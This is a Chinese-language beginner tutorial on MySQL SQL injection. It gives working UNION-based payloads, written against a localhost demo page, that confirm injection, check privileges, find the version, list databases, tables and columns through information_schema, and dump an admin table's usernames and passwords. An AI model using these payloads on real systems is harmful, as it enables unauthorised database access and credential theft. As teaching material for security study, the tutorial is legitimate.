SQL注入入门

源自于本人对SQL注入处于一种似懂非懂的尴尬

1.常见的几种SQL注入

1.数字型
2.字符型
3.文本型
4.搜索型(POST/GET)
5.cookie注入
6.SQL盲注
7.编码注入
8.宽字节注入

2.判断sql注入

2.数据库权限判断
3.判断字段数
4.查询库名
5.查表名
6.查字段
7.查数据

判断sql注入

提交单引号'

and大法和or大法

我们在参数后面加上 and 1=1

加法和减法

加法和减法的使用要区别是数字型还是字符型的注入、然后来区分了、可以看他后面的参数如果是数字、就一定是数字型、如果是一些字母的话就是字符型注入。
1.加法

我们在参数输入1+1，看看返回的数据是不是id等于2的结果，这里注意一下+号在SQL语句是有特效含义的，所以我们要对其进行url编码，最后也就是%2b。
2.减法

减法是同样的道理，不过不需要对-号进行url编码了

2.数据库权限判断

and ord(mid(user(),1,1))=114

解释:

判断ROOT权限 返回正确存在
或 and (select count(*) from mysql.user)>0

解释:

and (select count() from mysql.user)>0 / 如果结果返回正常,说明具有读写权限。
and (select count() from mysql.user)>0 / 返回错误，应该是管理员给数据库帐户降权了。

3.判断字段数

常用的两种猜解方式:

方法1、用union联合查询：and 1=1 union select 1,2,3,4,5…… 或 union select null,null,null.....

UNION SELECT 联合查询：可以用于一个或多个SELECT的结果集，但是他有一个条件，就是两个select查询语句的查询必须要有相同的列才可以执行，利用这个特性我们可以进行对比查询，也就是说当我们union select的列与它查询的列相同时，页面返回正常。在and后面加上1=1或1=2的作用后面会讲。
第二种：通过limit语句，limit在mysql中是用来分页的，通过他可以从查询出来的数据中获取我们想要的数据.
SELECT * FROM table LIMIT 5,10; // 检索记录行 6-15

4.查询库名

版本大于5.0的mysql的information_schema库中存储着mysql的所有数据库和表结构信息，所以可以利用information_schema库快速注入。
通过下面的语句可以判断数据库版本

and ord(mid(version(),1,1))>51
解释1： 确认数据库版本， 51是ASCII码3 正确则>4.0 错误则<4.0，当版本大于3.0时才能使用union方法；
解释2：ord()是mysql的函数用于获取二进制码；
解释3：mid()是mysql的函数用于截位操作；
解释4：version()是mysql的函数用于获取当前数据库的版本；
可以直接使用mysql自带函数database()查询得到数据库名：

http://localhost/sqls/index.php?id=2 union select 1,database(),3 limit 1,1
方法二:

使用以下语句语句得到所有的数据库名

http://localhost/sqls/index.php?id=2 union select null,schema_name,null from information_schema.schemata

查表名

在MySQL中，表名存放在information_schema数据库下tables表table_name字段中、查表名我们主要用到的是TABLES表。

方法一:

用group_concat它可以返回查询的所有结果，因为我们需要通过命名判断该我们需要的敏感数据。

group_concat()会计算哪些行属于同一组，将属于同一组的列显示出来。要返回哪些列，由函数参数(就是字段名)决定。分组必须有个标准，就是根据group by指定的列进行分组。
方法二:

使用下面的语句也是可以查出来的

http://localhost/sqls/index.php?id=2 union select null,table_name,null from information_schema.tables where table_schema='test'

查字段

在MySQL中，字段名存放在information_schema数据库下columns表column_name字段中,这里使用的是columns表。
方法一:

http://localhost/sqls/index.php?id=2 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='test' and table_name='sqltest'

查数据

最终想得到的就是字段里的内容了、前面的数据库名、表名都获得了、获取值就很简单了。

方法一:

查询admin表:
http://localhost/sqls/index.php?id=2 and 1=2 union select 1,group_concat(id,user,pwd),3 from admin